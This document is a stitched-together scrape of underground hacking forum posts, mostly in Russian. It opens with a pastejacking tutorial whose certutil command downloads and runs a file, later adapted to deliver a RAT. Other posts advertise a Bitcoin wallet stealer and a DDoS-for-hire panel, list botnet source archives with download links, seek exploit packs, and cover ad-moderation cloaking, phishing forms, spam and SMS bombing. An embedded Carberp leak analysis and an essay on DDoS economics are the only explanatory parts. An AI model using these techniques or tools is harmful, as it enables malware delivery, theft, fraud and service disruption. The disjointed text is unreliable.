Сегодня мы рассмотрим метод поставки нашего вируса/пейлоада на целевой ПК при
помощи команды в cmd. Без файлов. Совсем.
Приступим!
Для начала хочу показать вам фичу, при помощи которой в Windows можно
скачивать файлы, называется она certutil.
К примеру, чтобы скачать программу PuTTY команда в cmd должна быть такой:
certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Что-бы скачать и запустить файл, нужно добавить команду открытия файла, просто
добавляем & имяфайла.exe. Итоговая команда (в случае с путти) выглядит так:
certutil -urlcache -split -f https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & putty.exe
Выполнив эту команду, у нас скачается и запустится путти:
С запуском в cmd разобрались, теперь перейдём к Pastejacking'у. Я подготовил
простой html файл:
Теперь разберём как это работает.
При переходе на наш сайт (где мы предварительно находится наш html) будет
показан следующий текст:
![](/proxy.php?image=https%3A%2F%2Fteletype.in%2Ffiles%2Fb8%2Fb876bda1-e3c4-40b3-93ff-
defe2eb8ba1a.png&hash=e178da0b68e0268f90c451e442bc1865)
Если мы скопируем тест с сайта, и вставим в другое окно, мы увидим, что
скопировали наш скрипт:
Теперь протестируем в боевых условиях. Я сделал билд РАТника и загрузил его на
свой сервер, ведь нам нужна прямая ссылка на файл(!)
Далее нам нужно подредактировать html файл. Просто заменить ссылку на файл и
имя файла:
Результат:
Заключение.
Как видишь, для загрузки вируса на ПК в некоторых случаях ненужен даже
бинарник (относительно).
В идеале скрипт можно переделать под powershell, скрыть от пользователя. Но не
стоит недооценивать данный вектор атак. Если статья зайдёт, сделаю
продолжение, где работать мы будем через Kali Linux с одним интересным
инструментом для безфайловых атак.
Скачать PasteJacking страницу можно в Лаборотории.
Spoiler: NCT0ЧНNK
Ребят,кто может,пожалуйста дайте работающий SMS Bomber для Украины,в интернете работающие не нашёл,осталась одна надежда для вас.
подробнее в лс
прошу сразу не кидаться
интересуют способы монетизации смс спама с подмерй по европе
готовых.разжеванных схем не прошу.если кто может подсказать в какое
направление смотреть
работал по uk банкам,спам фильтры все тяжелей проходить,времени много уходит и
затратно
Вот такой вопрос.
Как упровлять бботами???
Вот там есть такое:
Task:1 From:2 To:266
Click to expand...
Может кто-нить объяснить что куда писать?
И вообще что озночает каждое из этих полей.
Т.к бботы по умолчанию получают первое задание, я просто переписал его, чтобб
они не спали, а ддосили.
Сами понимаете это геморой всегда 1.txt переписовать.
Приветствую вас дорогие читатели форума!
Готов предоставить вам услуги ддоса, а именно доступ к панели.
Панель достаточно мощная для того чтобы положить многие сайты и сервера, а
также есть ByPass методы!
Proof мощности:
https://imgur.com/a/6ixdNOt
Цена от 300 рублей, чем дороже тем больше мощность. (300 рублей ~ Layer4 - 35 Gbps | 75k r/s Layer7)
Оплатить можете спомощью: QIWI, PayPal.
Покупать тут - https://vk.com/kpachoe_ttjlam9 ~ VK | @danya_coder ~ Telegeram.
Отзывы - https://vk.com/topic-177992515_39967387
Можете покупать через гаранта за ваш счёт.
Ребята привет. Вообщем такой срочный вопрос.
Задача - Послать группе людей, на разные емейл адреса, веб форму, либо
документ, и надо, чтобы люди либо скачали, открыли док, заполнили, либо
перешли по линку в письме, и перед глазами у них была веб форма, которую я
подготовлю заранее.
Нужен доверительный сервис для глаз и на слуху, чтобы было доверие к нему.
Трабла в том, что если посылать гугл док, то нужен ак от гмейла, а это не
годится для моей схемы.
Есть он майкрософта тоже, но там надо hotmail live и т.д. мыла, а моя группа
людей, обитают на att comcast и на корп мылах.
Регать свой хост, подымать сервис онлайн редактирования загрузки доков, так же
не годиться, из за частых абуз.
Вопрос в чем, есть ли онлайн аналоги как гугл док, где можно создать документ, отправить на мыла людям, и при переходе, у них была право на заполнение, а не только на просмотр, и далее это все заполненое сейвилося в моем личном кабинете либо аккаунте того сервиса.
И другой вопрос, Можно ли в док или пдф организовать кнопку Отправить?
Сделать так, чтобы аттачем люди скачали документ, в пдф либо док, открыли,
заполнили данные у себя на компе, и там была прикручена кнопка Отправить ( но
надо отправка не на мейл, а может на мой сервак, что я укажу и линкану в эту
кнопку). Заполнили - Нажали на кнопку - Док улетел ко мне на сервак?
Кто шарит, подскажите реализацию.
Ну очень большая просьба, откликнуться всем кто понял о чем я, кто знает
сервисы, либо выход с ситуации отправки дока не по мейлу.
You must spend at least 7 day(s) on the forum to view the content.
Всем привет, хотел бы поделится способом как можно палить модераторов гугла без клоак, которые в нашем время расплодились и стоят не мало.
Как клоака палит ботов? :
-Проверяет по гео
-Проверяет по языку
-Проверяет передается ли ключевое слово после перехода по рекламе
etc.
Как мы будем клоачить? С помощью TDS, на примере keitaro
Настраиваем фильтр в tds
1. Проверяем гео посетителя, например если в аккаунте указан таргетинг Россия то делаем доступ только из РУ.
2. Язык объявлений ставим язык указанный в рекламной компании
3. Главное проверяем ключевое слово переданное. Боты переходят с ключом либо test либо просто передают &keyword={keyword}
Этих настроек достаточно что бы наебать adwords
p.s напишите плиз интересно будет почитать по adwords еще что нибудь? Знаю много фишек оттуда, долго лил трафик карж в том числе
Данный топик создан , для поддержки трафферов советами.
Со временем буду выкладывать схемы сливов , схемы апрувов бирж,
Скрипты для работы с биржами, и все что связанно сними только в этом топике
**
Ну чтож , поехали мои любимые трафферы =)**
Приветствую форумчан!
Дайте дельный совет как лучше сливать траф на связку, чтоб сайты "доноры" не
палились?
ЗЫ спалите хоть в в ПМ чтоли =/
A Bitcoin wallet stealer (short: BWS) steals the wallets of different programs and upload it to your FTP. Should be clear a wallet can make you balance what you want.
supports the following programs:
Bitcoin Qt
Electrum
MultiBit
In the Builder, you need to enter your FTP - data. You think I get out of a copy for me, shall not use the tool. But peace of mind .
The name of the wallets depends on the program and the PC - name and after the ending of the original wallet (.dat and. wallet).
You have the opportunity to test your FTP connection, advance in the Builder also what I also recommend you. Then you can't leave, if you want, grab the Server.exe with UPX. This is a 3/46 detection of the 1/46 detection.
Even if the final file is not FUD, please I you them not on VirusTotal, Novirusthanks, among others upload.
The program is written in C++ and has been tested on XP, Vista, 7, x 86 and x 64. I have no Windows 8 and will not think to even it, so it would be nice if one could test the program on Windows 8.
Click to expand...
passwd:dlab.org.in
Уже не является секретом тот факт, что полные исходные тексты известного банковского вредоносного ПО Carberp утекли в паблик. Около 5GB исходных текстов оказались в поле зрения фактически любого желающего. Архив включает в себя:
Как и в случае с Zeus, история началась с того, что архив с текстами был выставлен на продажу на нескольких подпольных форумах. Ниже представлен пост с объявлением с одного из форумов. Первоначально информация о том, что исходные тексты Carberp были выставлены на продажу [была опубликована](http://www.trusteer.com/blog/carberp-source-code-for-sale-free- bootkit-included) Trusteer 18-го июня, т. е. около недели назад. При этом указывалось, что цена архива составляет $50,000. Но позже на одном из форумов появилась информация, что тексты продаются по очень низкой цене, всего лишь $5,000. Архив включает в себя тексты вредоносного кода и купленные сторонние наработки с 2008 г.
Нам удалось получить архив с исходными текстами Carberp и мы можем констатировать тот факт, что утечка исходных текстов Carberp является самой крупной вообще из тех, что были раньше среди вредоносных программ. При этом в этот показатель входит как количество возможностей самого вредоносного кода, которые описываются включенными текстами, их степенью детальности, а также деструктивности, которую могут нанести клоны, основанные на этих исходных текстах.
Один из модераторов kernelmode.info, EP_X0FF собрал статистику по семействам вредоносных программ, функционал которых описан утекшими текстами. Этот список действительно впечатляет(!): Ursnif, Rovnix, Alureon, Phdet, Zeus, Vundo, SpyEye. Все эти семейства вредоносных программ очень хорошо известны ресерчерам и получили большое распространение.
Поясним, что Carberp изначально не имел своей bootkit-составляющей до 2011 г., когда разработчиками был куплен фреймворк Rovnix (одно из первых семейств буткитов, которое использовало метод заражения VBR, что позволяло загружать свой драйвер на x64 платформах в обход ограничений ОС). Код Rovnix и история включения его исходных текстов в Carberp были детально описаны нашим коллегой Александром Матросовым [здесь](http://www.welivesecurity.com/2012/07/13/rovnix-bootkit-framework- updated/). Мы также составляли [полный отчет](http://www.welivesecurity.com/2011/11/21/evolution-of-win32carberp- going-deeper/) об эволюции Carberp, в котором можно было отследить этапы развития вредоносного кода.
Многие издания и АВ-вендоры напишут или уже написали об инциденте, связанном с утечкой исходных текстов Carberp, так как это действительно громкий инцидент, который может повлечь за собой неприятные последствия. Имеется в виду факт появления клонов как самого банковского вредоносного ПО Carberp, буткит- платформы Rovnix, так и другого вредоносного кода, который может быть создан по оказавшимся в паблике исходным текстам вредоносного кода.
Нынче в паблике только
Элианора
nuclear
Phoenix Exploits Kit
Black Hole
какую посоветуете купить?
феник говорят уг
элианора хз
БХ - саапорт редко отвечает
нуклер вообще хз что это, подозрительно дешево стоит)
Народ может кто подробно рассказат как сливать iframe трафф , каой софт нужен, да и вообще всё остальное...
Если можно дайте линки на статьи (если таковые имеются )
hi
i am looking to buy a private exploit pack, crimepack, fragus, eleanore etc
any help appreciated
Вот решил поставить маленький ботнет на шеллах, а может и на своём боте
который я накумарил на php
, вопрос тупой - куда кидать шеллы или боты, хотелось вначале нарегать кучу
фрихостов (с поддержкой php конечно) и туда накидать шеллов либо ботов - но
сразуже вспомнил что на фрихостах отключен soket`ы и fopen. А гдеж тогда боты
то распологать, можно сайты ломать - но сейчас все основные дырки везде
прикрыты
. Как быть, что делать, может кто чё нить посоветует ...
Жду ваших ответов дорогие участники форума )
Не спрашивайте почему - радуйтесь лучше, что есть такая возможность!
Гарант - за ваш счёт.
5555три43
Товарищи. Ждите загрузки картинки если хотите почитать.
Zunker Panel v1.4.5b << not public
ZUnker Panel v1.5.1-RC1 << not public
bot versions
3.3.19
3.7.1
3.3.1
3.2.10
3.2.7 << Public
3.3.18
http://pandalabs.pandasecurity.com/zunker/
[http://www.symantec.com/connect/de/blogs/m...ts-german-
users](http://www.symantec.com/connect/de/blogs/mespam-meets-zunker-and-
targets-german-users)
http://pandalabs.pandasecurity.com/zunker-...ls-another-
bot/
(Panel 1.4.3-RC4 // 1.4.4-1b and Bot Version 3.2.7)
http://rapidshare.com/files/54447890/zunkerb0t.rar
(Panel 1.4.4-1b)
http://rapidshare.com/files/45153481/zunkerbot.zip
(Panel 1.4.3-RC4 // 1.4.4-1b)
[http://rapidshare.com/files/362128045/_BOT...t-1.4.5-src.rar](http://rapidshare.com/files/362128045/BOTNET-
PHP-Zunkerbot-1.4.5-src.rar)
(Panel 1.4.3-RC4)
http://rapidshare.com/files/39109844/zunker.rar
(Panel 1.4.3-RC4)
http://rapidshare.com/files/45155532/zunker.zip
(Panel 1.4.4-1b and Bot Version 3.2.7)
http://rs496l33.rapidshare.com/files/45451514/zupacha.rar
В целях защиты ботнетов/связок и иных малварь собирается список ip адресов
всех поисковиков, всех малваре-листов.
Кому не сложно - пропарсите логи апача и т.п. на предмет ip адресов гуглботов
и иных поисковиков. Я постараюсь за день собрать ip серверов малварь-листов.
Если у кого есть готовые списки - прошу поделиться.
Список собирается для блокировки входов на наши сервера/домены.
p.s. думаю многим полезно будет.
Прежде, чем написать здесь топик, пошарился по инету, заглянул в паблик связки, ковырял MSF и побывал на зеркалах милворма, но так и не смог найти то, что мне нужно. А нужны мне необфусцированные сплоиты на JS для браузеров с remote / download под windows. Или хотя бы назовите эти сплоиты, как они пишутся в MSF (или дайте мануал по MSF, я не шарю в ruby)
Боты не отстукивают в админку....
Зарегился на ax3.net, залил файлы на фтп, создал базу данных, внес все изменения в config.php, скачал только GeoLiteCity.dat и загрузил в папку Net (тк там уже есть GeoIP.dat).
объясните пожалуйста почему боты не стучат, что делаю не так? может у кого есть подробный мануал?
Привет всем.
Проблема следующая. Делаю подгруз 20k ботов в день, криптую black energy 1.7. Он не палица. Но на следующий день только 3.5k онлайн, что за ерунда? Если не сложно постучите в icq , побеседуем. Отблагодарю WMZ за ценный совет.
Доброго времени суток, господа форумчане =)
на этом портале я не так давно, но думаю вы пойдете на встречу новичку xD
В общем нужна помощ в поднятии сокс5 ботнета.
Загрузки человек мне предоставит, мне нужен ехе бота и файлы на хосте, кто
может сделать мне ехе и помоч с хостом?
хост есть, домен есть, поддомен нужен - немогу найти как его создать на моем
сервисе
Так вот у кого есть приватный сокс5 бот или паблик помоги сделать все по
высшему разряду, и желательно криптануть - если есть такие добродетели.
Не скажу что со своей стороны не смогу помоч, вчера свел $ на карту - на счету
7$ осталось, чтоб отблагодарить человека думаю хватит. :baby:
Спасибо за внимание, с уважением, Я! :punk:
Мне необходим сабж, для а) изучения б) модификации в) использования ..
Прошу выложить все что найдете) Заранее большое спасибо.
Поиск использовал, все ссылки устерли. Что сейчас актуально?
я немного выпал из темы, ранее пользовался giga-bot,rxbot.. что актуально
сейас? исходники чего можно достать?
Есть мыло, надо его проспамить... Подскажите, пожалуйста, как и с помощью чего это делается ?
Вот что о данном боте говорит аффтар
В связи с высоким интересом темы ДДоС и большим количеством заказов такого
софта нами был разработан собственный, серийный продукт.
Первые же тесты показали что бот намного эффективнее предшественников (Black
Energy, Illusion, etc...), его основные преимущества...
Навсякий случай настраивал на виртуалке.
Сам бот
http://upload.com.ua/get/900892463
машины почему то не отстукивают, наверно я ламер)
Пользуемся и говорим у кого как
Снимки c панели управления
Главный отдел
http://img183.imageshack.us/my.php?image=capture1.gif
Расписание атак
http://img183.imageshack.us/my.php?image=capture2.gif
Неактивные боты
http://img183.imageshack.us/my.php?image=capture3r.gif
В архиве 2 версии админки, новая и старая)
Coder: Jozgi
Serversize: 37kb
funktions:
- Autorun fixed
- HTTP-Proxy
- some protections
- random port
commands:
!server.help [commandlist]
!server.version [server version]
!server.ende [shutdown the server , after restart he is back]
!server.proxy [shows the proxy ip and port]
[skip]
Добрый вечер. Все вы здаете что при создании рекламной (иногда) и спамной рассылки лучше чередовать темы, тексты, имена отправителей и сами названия ящиков. Поэтому чтобы вручную не регистрировать 100 ящиков например на gmail.com придуманы программы типа Gmail Account Creator.
У кого есть что-нибудь работающее в настоящий момент и желательно с таблеткой?!
Куплю актуальный, грамотно реализованный ддос бот, рассмотрю варианты написания под заказ, кинуть меня не получится, не тратьте время.. =)
Что в данный момент фигурирует на приватной сцене с поддержкой? Контакты разработчиков в пм плз.
Кто что может посоветовать, паблик, приват, очень надо
И щется сабж в котором РАБОТАЮТ все функции .
IL TDS – система управления трафиком. По заданным условиям скрипт распределяет трафик на указанные ресурсам.
На данный момент IL TDS умеет:
ТДС полностью бесплатна. У нее открытый код, ни какого воровства трафа.
Автор TDS:Spamil
Есть кто нибудь здесь по загрузкам ?
Требуется рассылка писем по пхп, рабочий скрипт ( который будет функционировать на бесплатных хостингах ) ... пожалуйста скажите названия действующих и актуальных спаммеров ) Дело в том что щяс нет возможности лазить по всему интеу в поисках не зная чего... расчитываю на рабочую функциональную утилиту, бюджет пока 1000 рублей..
@@DarkSecurity FIXED DDOS @@.rar
[RxBot.F-UP.lsass+sasser.ftpd.1].rar
[sHk-Bot.svchost-ns-dev.NOT-FOR-RELEASE].rar
120-[BruteTest]-V0.5.rar
120-[DVNC-TEST]-DDOS-V1.0.rar
120-[ModBot]-SNIFF-SP2-KEYLOG-NICK-VNCBRUTE.rar
120-[ModBot]-SNIFF-VNCBRUTE-SP2FIX-NICK.rar
120-[ModBot]-SP2FIX-SYM-VNCBRUTE.rar
120-[ModBot]-V0.5.rar
120-[ModBot]-V1.0.rar
120-[ModBot]-VNCBRUTE-MSSQL-2007.rar
120-[netapi-sym-mohaa]-(vncbrute-sp2patch).rar
120-[SP2fix-VncBrute]-FINALV1.0.rar
120-[SP2FIX-VNCBrute-Mohaa]-STRIP V1.0.rar
120-[SP2FIX-VNCBrute-Mohaa]-Test V1.0.rar
120-[SP2-PATCH]-V2.0.rar
120-[SP2-PATCH-BRUTE]-V2.0.rar
120-MSSQL-SYM-NTPASS-VNC-NETAPI-2007.rar
120-PSTORE-MSSQL-SYM-NTPASS-VNC-NETAPI-2007.rar
abot.rar
AkBot_IRC_-lsd_mod.rar
AkBot_IRC-VERSION_DLL.rar
AkBot_IRC-VERSION_DLL-DNS.rar
Akbot_v0.4.1_netapi_.rar
AkBot-x0r-dns.rar
boats.rar
bot.rar
bothacker.rar
CYBERBOTv2.2-Stable.m0dd_ownz.DreamWoRK.rar
db31.rar
db31x2007.rar
dbot.rar
Dbot.v3.1.rar
dopebot0.22.rar
GENTOOreptile-base.rar
harvecter_bot.rar
H-Bot M0d 3.0 M0dd3d by TH & Sculay.rar
hellbot10-06-05.rar
myudf.rar
nekilla.rar
niggerbot-vnc-nocrypt.rar
NITE-AIM.rar
nzmlite.rar
nzmlite+sym.rar
ravbot.rar
rbot0.2-scionix-102b-working.rar
rBot0.3.3Pub.rar
rbot-0.3.2-fix1-public.rar
rBot-0.3.2-SMOD-RPMiSO-EDiTION.rar
rBot v0.6.6 priv lsass.rar
rBot.(rXBot).FTPD.iTALY_DoS_Resilient_RPMiSO_Final_Mod.rar
rBot.Antrhax.lsass.optix.masterpass.rar
rBot_060104_RxBot_v0.6.6a.pk_Isass_VG_Pr1v8.rar
rBot_060104_RxBot_v0.7.8.pk_Isass_VG_Pr1v8.rar
rBot_(rxbot)041504-dcom-lsass-priv-fixedOptix.rar
rBot(rXbot)DoS_ResilienT_7252004.rar
rbot_blood_mod.rar
rBot_dimensionfix_v.4.3.rar
rbot_dnsquery2007.rar
rBoT_oTh3R-dImeNsIoN_4.4x.rar
rbot-incv3b.rar
rBot-nzm-m0d.rar
reptile.03.PNP.ASN.rar
reptile.03.PNP.ASN_improved-psniff-undetected_VNC.rar
reptile-pnp.rar
rKxbot022b.rar
Rose v1.3 2007 by DreamWoRK.rar
Rouge-Bots_xdcc.rar
Ruffbot1.2-MassAsnPrivShit-150705.rar
Rx120-VnC-Brute+pStore.rar
RX-120-MYSQL1THREAD-V2.rar
RX-120-MYSQLBRUTE-V2.rar
RX-120-MYSQL-V2.rar
RX-120-MYSQL-V999.rar
rx v8-FINAL.rar
rx.rar
rx_dev+service+working_lsass+sasser+ftpd.rar
rX_lsdigital_Mod_priv.rar
rx-asn-2-re-worked v3.rar
rx-ASN_MOD.rar
RXB()tM()d-VNC-NETAPI-ASN-2006.rar
rxBot0.6.6d-priv+stable-CoKeHeAd.rar
rxBot0.6.6d-priv-lsass2-bleh.rar
rxbot7.5.rar
rxbot69Dfix.rar
rxBot v0.7.7 Sass.rar
Rxbot v8 Ftp+Tftp.rar
Rxbot v8 Ftp-Tftp.rar
Rxbot_7.6-Modded-Tr0gdor.rar
rxbot_v0.6.5_pk__lsdigital_spreader.rar
rxBot_v0.7.7_Sass-priv8.rar
Rxbot-ak-0.7-Modded.by.Uncanny.rar
Rxbot-ak-7.7-fira-pviv8.rar
rxbot-EcLiPsE1.1.priv.rar
rxBot-FTPD.rar
rxBot-sxt-harro.rar
RX-GUTTED.rar
rxhellbot_v8.8.rar
rx-mp.rar
rx-sky2kpnpprivate.rar
RX-STRIP-BOTKILLER-0.5.rar
sd with fake xdcc by Synco.zip
sdbot04b.rar
sdbot04b.zip
sdbot05a.rar
sdbot05b.rar
sdbot05b[skbot]mods_by_sketch.rar
sdbot05b_skbot__mods_by_sketch.rar
sdbot05b_syn&_nick.rar
sdbot05b-AE.zip
sdbot05b-ago.rar
SDbot05b-getadm.rar
Sdbot_Hardcore_Mod_By_StOner.zip
sdbot_syn.zip
sdbot_syn_secure_1.zip
sdbot_synx.zip
SDBot_with_NB spreader.rar
sdbot-b0rg-by-okasvi.rar
sdbotconstant_nick_mod.rar
sdboti3s.rar
sdbot-ntpass-codefix-nils-22.10.03.rar
SDBOTNTSharesHardCorePrivM0D.rar
sdbot-syn-nbspread.zip
sdbotvnc.rar
sdnbbot_sp2mod_wks_kelvir.rar
shadowbotv3.rar
shadowbotv3-skysyn.rar
SKUZ-NETAPI_VNC_ASN-2006.rar
SkuZ-Netapi-VNC-IM.rar
SkuZ-Netapi-Vnc-M0D-XXX-06-BuZ.rar
SkuZ-Netapi-Vnc-Sym-IM-2007.rar
SkuZ-VnC-NeTaPi-BaN-2006.rar
SkuZ-VNC-NETAPI-SYM-SP2-MOD.rar
SkuZ-VNC-TFTP-GOOD-2006.rar
skybot.rar
SnRxBot.rar
SpazBot.rar
spybot1.3.zip
spybot1.4.zip
Stripped-RXV8.rar
tbot-mod.rar
VBbot.zip
VIRC.rar
wisdom.rar
wisdom_phr0st_modd.zip
Wiseg3ck0-AIM-DDOS-.rar
woopiebot.rar
X-Bot.rar
xTBot.0.0.2-priv.rar
zunker.zip
zunkerbot.zip
http://rapidshare.com/files/82063405/150_Bots.rar :ph34r:
pass: seconded
------------------------
30 DDOS TOOLs
http://rs84.rapidshare.com/files/40856215/DDOS.rar
PASSWORD:canvas
На работоспособность не проверялось!!!На свой страх и риск
[Doorways Guide [part1]](http://qnet.bazkid.org.ru/dl/doorways-
guide.part1.rar)
[Doorways Guide [part2]](http://qnet.bazkid.org.ru/dl/doorways-
guide.part2.rar)
[Doorways Guide [part3]](http://qnet.bazkid.org.ru/dl/doorways-
guide.part3.rar)
Какие мнения у авторитетных пользователей по поводу сей проги? Или может кто- нибудь подскажет альтернативу ей? ОЧень нужно.Заранее спасибо.
Агент Mail.ru вышел сравнительно недавно и представляет из себя грубое подобие аси, но какой-то умелиц уже изобрел прогу для его спама. Если кто слышал об ентой проги или является счастливым обладателем то оставьте свой комментарий а лучше скинте саму прогу. Я собираю коллекцию спамерских прог и собственно говоря уже давно и безрезультатно пытаюсь найти спамера Агент Mail.ru.
Народ,выручите.Нужен Gigabot.Если у кого есть,киньте линк на него пожалуйста.
Есть такая тема.
Могу поставлять базы мыльников.
В день до 10 000. (как самому повезет)
Цены договорные.
Стучать в асю.
Вобщем если есть люди разбирающиеся в этом то плз оцениваем скока это будет мне стоить, за сколько по минимуму можно купить такую весч?
Выложите несколько прог для сбора мыл с форумов дедика при помощи дедикейта ) :baby:
Чем выше скорость тем лучше !) Всем кто выложит буду благодарен , ну и думаю не только я )
Ы ! Я знаю что чуть выше есть такая бяка как спам тулз - там подходящего сборщика не нашел , вернее на него нужОн крет и он мылы собирает не очень быстро )
:nukesign:
Создал базу.Запускаю скрипт со своего хоста и нефига не пашет.Другие cgi-
скрипты нормально работают. На локалхосте тоже не работает.Посоветуйте что-
нибудь,люди.Как запустить админку эту?
Может какие-нибудь дополнительные модули для перла установить нужно?
вот много раз слышал это слово) ну и конечно более менее понимаю что это такое
, но не когда с тим не работал,огли бы вы написать небольшой фак такого
примера
1-гдк взять (более менее норм, паблик)
2-как настроить
3-что ещё для этого надо
4-ну и собсно все настройки пошагово
заранее спс,аю многим это будет полезно
Предлагаю сервис по загрузке ваших троев/соксов.
Немного о сервисе:
В сутки проходит через мои експы до 40-60к загрузок
среди них я могу делать выборку по странам
например самые популярные Uk De Us Es It Fr Au Nz
Также есть европа (микс всех стран), цена которой значительно меньше, потому
как её намного больше и быстрее прогружать клиентам (что б не спрашивали
откуда такие цены)
Итак цены:
Европа 30 вмз
Германия 250 вмз
Юса 130 вмз
Турция 150 вмз
ЮК 350
Испания 350
В больших обьемах предоставляеться скидка!
Au Nz - на данный момент заняты - по ним пока не стучать...
Контакт со мной держать по ICQ 287045702
У меня таой вопрос сколько нужно ботов находящихся в онлайне чтобы завалить мелкий/средний сервак ...
Ни для кого не секрет, что сегодня одним из самых распространенных типов
хакерских воздействий на веб-серверы являются распределенные атаки на отказ в
обслуживании (DDoS-атаки). Суть их заключается в одновременной отправке на
компьютер-жертву множества специально созданных запросов с большого количества
удаленных ПК. В результате этого сервер оказывается недоступным для обычных
посетителей. То есть фактически DDoS-атаки направлены исключительно на
разрушение. Но, как говорится в одной очень хорошей книге, "раз звезды на небе
зажигаются, значит, это кому-нибудь нужно". Так что давайте мы с вами,
уважаемые читатели, попробуем выяснить, кому нужны DDoS-атаки и что они дают
своим организаторам.
Для того чтобы разобраться в причинах появления DDoS-атак, необходимо понять, кто их организовывает. Сразу отметим, что это под силу только очень хорошим специалистам или целым их группам. То есть речь идет о достаточно серьезных людях, не увлекающихся в отличие от так называемых "скриптовых деток" хулиганскими выходками. Так вот, еще буквально 5-10 лет назад практически все хакерские группировки были идейными. То есть они объединяли людей, которые боролись (если, конечно, это можно назвать борьбой) с кем-то или за что-то. Особенно популярными были национальные и религиозные объединения. Например, достаточно широкую огласку в прессе получило противостояние американских и китайских хакеров, участники которого по очереди атаковали правительственные сайты своих противников. Однако сегодня число идейных объединений хакеров постоянно падает. Все больше и больше людей пытаются получить за свои знания не моральное, а материальное вознаграждение. То есть современные хакеры предпочитают зарабатывать деньги. Некоторые из них взламывают для пиратов игры и различные программы, другие предпочитают воровать информацию на заказ. Ну и, конечно же, есть группы хакеров, занимающихся организацией DDoS-атак.
Итак, мы с вами, уважаемые читатели, разобрались, что большая часть
современных DDoS-атак проводятся хакерами с целью заработка фактически по
экономическим причинам. А поэтому давайте попробуем рассмотреть эти
воздействия именно с точки зрения экономики. То есть мы допускаем, что цель
DDoS-атаки - это получение ее организаторами прибыли, которая является
разницей между их доходами и расходами.
Организация серьезной атаки на отказ в обслуживании требует существенной подготовки. Ведь для достижения успеха в ней должны участвовать сотни, а то и тысячи компьютеров. Причем использовать машины членов группы для этого нельзя
После того как зараженными оказывается достаточное число компьютеров, система может считаться готовой к атаке. Но на кого ее направить? Ответ на этот вопрос зависит от того, какой способ извлечения дохода из своей деятельности избрала преступная группировка. Всего существует два варианта: заказное "убийство" сайтов и вымогательство. Давайте подробно рассмотрим каждый из них.
Современные хакеры предпочитают зарабатывать деньги
В первом случае хакеры сначала ищут клиентов, то есть людей, готовых заплатить за организацию DDoS-атаки на тот или иной сайт. Для этого используются разные методы: спам*, размещение объявлений на различных досках и форумах и т. д. Естественно, все общение с потенциальными заказчиками осуществляется исключительно через Интернет с помощью бесплатных почтовых серверов, анонимных аккаунтов ICQ и т. д.
Заказчиками "убийства" сайтов чаще всего являются коммерческие компании. Это один из методов нечистоплотной конкуренции, когда компания преступным способом пытается доставить неприятности своим соперникам. В принципе заказчиками могут выступать и любые другие организации. Например, не исключен вариант, когда представители какой-нибудь террористической организации "закажут" правительственный сайт или сайт газеты, которая о них плохо отозвалась. Кроме того, заплатить за организацию DDoS-атаки могут люди, занимающиеся махинациями на биржах, если им по каким-то причинам нужно будет сорвать торги.
Цены на услуги по организации DDoS-атак колеблются достаточно сильно. Какого- то единого тарифа, естественно, не существует. Каждый конкретный случай обсуждается отдельно. Минимальная цена - 150 долларов за каждые сутки простоя сайта-жертвы. В прошлом году корреспондент газеты "Ведомости" брал интервью у анонимного представителя одной из хакерских группировок. Во время разговора этот человек оценил атаку на сайт президента РФ примерно в 300 долларов, а на веб-сервер компании Microsoft - более чем в 10 тысяч долларов в сутки. Кстати, сегодня в Интернете действует немало мошенников, которые только изображают из себя хакеров. Они также рассылают всем свои предложения по организации атак на любые сайты, берут за это деньги и... исчезают. Кроме того, свои "услуги" предлагают и "скриптовые детки". Освоив азы интернет-технологий, почитав форумы и скачав несколько специальных утилит, они считают себя вполне способными на организацию заказных атак. Так что любой человек, решивший обратиться к хакерам за услугами, должен понимать, что он рискует просто- напросто подарить свои деньги мошенникам или непрофессионалам, что в общем-то одно и то же.
Вторым способом получения дохода от организации DDoS-атак, как мы уже говорили, является вымогательство. Суть его такова. Сначала группа хакеров выбирает себе жертву. Практически всегда ей становится какая-нибудь компания средних размеров, активно использующая свой веб-сайт в бизнесе, например, для общения с партнерами, приема удаленных заказов и т. п. Следующий шаг - это проведение DDoS-атаки на сайт этой фирмы. Ну а потом хакерам остается только связаться с руководством компании и потребовать выкуп за ее прекращение.
Впрочем, стоит отметить, что сегодня такой способ получения доходов хакерами
почти не используется. И в этом нет абсолютно ничего удивительного. Во-первых,
вымогательство - это лишний риск для организаторов атак. С одной стороны,
компания может обратиться в соответствующие органы, так что безопасно получить
деньги хакерам гораздо сложнее. А с другой стороны, в случае вымогательства к
чисто "компьютерным" статьям Уголовного кодекса добавляется еще одна, и
достаточно серьезная. Кроме того, стоит отметить, что сегодня существуют
некоторые способы борьбы с DDoS-атаками. Например, хорошие хостинг-провайдеры
способны просто-напросто отсечь зловредные запросы. То есть осуществить
длительную атаку будет очень и очень непросто. Так что компании-жертве совсем
не обязательно платить хакерам деньги, достаточно просто подождать один день.
Ну а теперь, уважаемые читатели, пришла пора подвести итоги. Сегодня большинство серьезных хакеров, работающих в Интернете, просто-напросто пытаются заработать. Так что многие DDoS-атаки вызываются чисто экономическими причинами: нашлись люди, которые захотели заплатить за их проведение. Ну а пока есть спрос, есть и предложение. Тем более что практически никаких финансовых затрат на проведение DDoS-атак хакеры не несут. От них требуется только оплатить услуги провайдера и потратить свое собственное время.
Нужно насрать одному человеку, у него что-то вроде конторки своей, хостинг,
инет для домашних сетей и т.д.
Вот думаю: реально ли сделать ботнет из самых мусорных загрузок... Т.е. бот
надолго не нужен...
Просто подосить ресурсы того человека, что бы порядком трафика нагнать ему...
Реально ли?
зы. Не пинайте сильно... Мало чё понимаю в загрузках, да и вообще в ботнетах.
Интерьвью с автором популярного DDoS бота.
Вот столкнулся с проблемой, мне этой нужно для настройки бота,
автора в инете редко вижу, попрошу помощи у вас, бот Suicide Ddos bot.
Файл имеет расширение sql.
скачал прогу Atomic Email Hunter v3.20! Но никак не могу воспользоваться ей. То есть когда нажимаю типа расылка на мэйлы, то нужно зарегаться и что-то еще. может вы скажешь мне серийный номер??????
DDoS-атаки в последние несколько лет стали одним из самых распространенных
преступлений в киберпространстве. Чаще всего хакеры организуют подобные
нападения на серверы государственных органов и крупных бизнес-структур. Более
того, в 2004 году появился такой вид преступлений, как шантаж возможностью
проведения DDoS-атаки.
Основы
